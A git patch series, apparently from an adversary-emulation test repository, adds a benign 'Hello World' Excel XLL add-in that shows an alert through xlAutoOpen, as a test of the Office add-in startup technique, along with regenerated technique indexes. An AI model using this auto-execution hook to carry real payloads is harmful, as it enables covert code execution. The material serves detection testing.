+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <AdditionalDependencies>C:\2010 Office System Developer Resources\Excel2010XLLSDK\LIB\x64\XLCALL32.LIB;%(AdditionalDependencies)</AdditionalDependencies>
+      <ModuleDefinitionFile>HelloWorldXll.def</ModuleDefinitionFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <Text Include="ReadMe.txt" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="dllmain.cpp">
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+      </PrecompiledHeader>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+      </PrecompiledHeader>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+      </PrecompiledHeader>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+      </PrecompiledHeader>
+    </ClCompile>
+    <ClCompile Include="HelloWorldXll.cpp" />
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="HelloWorldXll.def" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.vcxproj.filters b/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.vcxproj.filters
new file mode 100644
index 00000000..26e577de
--- /dev/null
+++ b/atomics/T1137.006/src/HelloWorldXll/HelloWorldXll.vcxproj.filters
@@ -0,0 +1,44 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <Text Include="ReadMe.txt" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="targetver.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="stdafx.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="HelloWorldXll.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="dllmain.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <None Include="HelloWorldXll.def">
+      <Filter>Source Files</Filter>
+    </None>
+  </ItemGroup>
+</Project>
\ No newline at end of file
diff --git a/atomics/T1137.006/src/HelloWorldXll/dllmain.cpp b/atomics/T1137.006/src/HelloWorldXll/dllmain.cpp
new file mode 100644
index 00000000..69b58914
--- /dev/null
+++ b/atomics/T1137.006/src/HelloWorldXll/dllmain.cpp
@@ -0,0 +1,19 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "stdafx.h"
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+					 )
+{
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+	case DLL_PROCESS_DETACH:
+		break;
+	}
+	return TRUE;
+}
+
diff --git a/atomics/T1137.006/src/HelloWorldXll/stdafx.cpp b/atomics/T1137.006/src/HelloWorldXll/stdafx.cpp
new file mode 100644
index 00000000..5708c398
--- /dev/null
+++ b/atomics/T1137.006/src/HelloWorldXll/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// HelloWorldXll.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
diff --git a/atomics/T1137.006/src/HelloWorldXll/stdafx.h b/atomics/T1137.006/src/HelloWorldXll/stdafx.h
new file mode 100644
index 00000000..bf593989
--- /dev/null
+++ b/atomics/T1137.006/src/HelloWorldXll/stdafx.h
@@ -0,0 +1,15 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#define WIN32_LEAN_AND_MEAN             // Exclude rarely-used stuff from Windows headers
+// Windows Header Files:
+#include <windows.h>
+
+#include <stdlib.h>
+#include "xlcall.h"
diff --git a/atomics/T1137.006/src/HelloWorldXll/targetver.h b/atomics/T1137.006/src/HelloWorldXll/targetver.h
new file mode 100644
index 00000000..87c0086d
--- /dev/null
+++ b/atomics/T1137.006/src/HelloWorldXll/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>
diff --git a/atomics/T1137.006/src/readme.md b/atomics/T1137.006/src/readme.md
new file mode 100644
index 00000000..9f82d7ee
--- /dev/null
+++ b/atomics/T1137.006/src/readme.md
@@ -0,0 +1,70 @@
+# Hello World XLL
+
+This is a simple XLL, showing how to create an XLL from scratch.
+
+## Requirements
+
+* A 64-bit version of Excel
+* [Microsoft Visual Studio 2015 Community Edition](https://www.visualstudio.com/en-us/products/visual-studio-community-vs.aspx)
+* [The Excel 2010 SDX](https://www.microsoft.com/en-us/download/details.aspx?id=20199). Instructions assume this is installed at C:\2010 Office System Developer Resources\Excel2010XLLSDK
+
+## Reference
+
+For further details on creating XLLs, dealing with XLOPERs and correct memory handling, I recommend Steve Dalton's excellent [Financial Applications using Excel Add-in Development in C/C++](http://www.amazon.com/Financial-Applications-using-Excel-Development/dp/0470027975)
+
+## Build and Load Instructions
+
+Instructions assume the solution is at "C:\Users\Jameson\Documents\Visual Studio 2015\Projects\HelloWorldXll\HelloWorldXll.sln". Adjust the steps below according to the location your cloned this project on your system.
+
+- Load the solution in Visual Studio.
+- Build the solution (Menu: Build... Build Solution)
+- In Excel, open the Add-Ins dialog (this can be done quickly with Alt-T, I)
+- Click "Browse..."
+- Select the XLL at "C:\Users\Jameson\Documents\Visual Studio 2015\Projects\HelloWorldXll\x64\Debug\HelloWorldXll.xll". Click OK.
+- If Excel asks "A file name '...' already exists in this location. Do you want to replace it?", click Yes.
+- Click Ok.
+- Excel should display a dialog that says "Hello world". This is from the XLL. Click OK to dismiss the dialog.
+
+## Creation instructions
+
+- Create a new solution (Mone: File... New... Project)
+- In Templates... Other Languages... Visual C++ select Win32. Select Win32 Project. Set Name to "HelloWorldXll". Set Solution name to "HelloWorldXll". Ensure "Create directory for solution" is checked. Click OK. Note: These instructions assume the Location is set to "C:\Users\Jameson\Documents\Visual Studio 2015\Projects". Adjust the steps below according to the location you use.
+- Click Next at the Overview page.
+- Select Application type "DLL". Clear the checkboxes for Precompiled header and Security Development Lifecycle. Click Finish.
+- In the Solution Explorer, right click the HelloWorldXll and select Properties.
+- Select Configuration "All Configurations" and Platform "x64".
+- In Configuration Properties...General, Set Target Extension to ".xll".
+- In Configuration Properties...C/C++...General, select "Additional Include Directories", click the dropdown arrow on the right, select "Edit...". In the Additional Include Directories dialog, click the New Line icon (it looks like a folder with a red star, in the top-right corner of the window). This will create a new line in the top input box (the ungreyed one). Click the "..." button on the right of that line, which will open a Select Directory dialog. Navigate to "C:\2010 Office System Developer Resources\Excel2010XLLSDK\INCLUDE" and click "Select Folder". Click OK to set the Additional Include Directories.
+- In Configuration Proporties...Linker..Input, edit the "Additional Dependencies" as with the previous step. In the top edit box (the ungreyed one), add the text "C:\2010 Office System Developer Resources\Excel2010XLLSDK\LIB\x64\XLCALL32.LIB". Click OK to set the Additional Dependencies.
+- In stdafx.h, add the following lines at the end of the file:
+```c
+#include <stdlib.h>
+#include "xlcall.h"
+```
+- In HelloWorldXll.cpp add the following lines at the end of the file:
+```c
+short __stdcall xlAutoOpen()
+{
+	char *text= "Hello world";
+	size_t text_len = strlen(text);
+	XLOPER message;
+	message.xltype = xltypeStr;
+	message.val.str = (char *)malloc(text_len + 2);
+	memcpy(message.val.str + 1, text, text_len + 1);
+	message.val.str[0] = (char)text_len;
+	XLOPER dialog_type;
+	dialog_type.xltype = xltypeInt;
+	dialog_type.val.w = 2;
+	Excel4(xlcAlert, NULL, 2, &message, &dialog_type);
+	return 1;
+}
+```
+- In the Solution Explorer, right click the HelloWorldXll and select Add..New Item.
+- In the Add New Item dialog, in the tree on the left, select Visual C++... Code. Then select Module-Definition File (.def). Set Name to "HelloWorldXll.def". Click Add.
+- Change the contents of HelloWorldXll.def to:
+```
+EXPORTS
+	xlAutoOpen
+```
+
+The solution is now ready to build and load using the instructions above.

From e577e8b72f4b458a30de06757ed86950347f326c Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Fri, 6 Aug 2021 21:59:18 +0000
Subject: [PATCH 02/39] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1137.006/T1137.006.yaml | 1 +
 atomics/used_guids.txt           | 1 +
 2 files changed, 2 insertions(+)

diff --git a/atomics/T1137.006/T1137.006.yaml b/atomics/T1137.006/T1137.006.yaml
index 628ece51..5ea20818 100644
--- a/atomics/T1137.006/T1137.006.yaml
+++ b/atomics/T1137.006/T1137.006.yaml
@@ -3,6 +3,7 @@ display_name: 'Office Application Startup: Add-ins'
 
 atomic_tests:
 - name: Code Executed Via Excel Add-in File (Xll)
+  auto_generated_guid: 441b1a0f-a771-428a-8af0-e99e4698cda3
   description: |
     Downloads a XLL file and loads it using the excel add-ins library.
     This causes excel to display the message "Hello World"
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index c952d755..30af7be8 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -758,3 +758,4 @@ c1d8c4eb-88da-4927-ae97-c7c25893803b
 c4ae0701-88d3-4cd8-8bce-4801ed9f97e4
 7b697ece-8270-46b5-bbc7-6b9e27081831
 419cca0c-fa52-4572-b0d7-bc7c6f388a27
+441b1a0f-a771-428a-8af0-e99e4698cda3

From fcacbd16eba33b1e48671438b75c8983c91c7983 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Fri, 6 Aug 2021 21:59:23 +0000
Subject: [PATCH 03/39] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 .../art-navigator-layer-windows.json          |  2 +-
 .../art-navigator-layer.json                  |  2 +-
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  3 +-
 .../Indexes/Indexes-Markdown/windows-index.md |  3 +-
 atomics/Indexes/Matrices/matrix.md            |  2 +-
 atomics/Indexes/Matrices/windows-matrix.md    |  2 +-
 atomics/Indexes/index.yaml                    | 26 +++++++++-
 atomics/T1137.006/T1137.006.md                | 47 +++++++++++++++++++
 10 files changed, 82 insertions(+), 7 deletions(-)
 create mode 100644 atomics/T1137.006/T1137.006.md

diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index a0247816..606f3545 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomi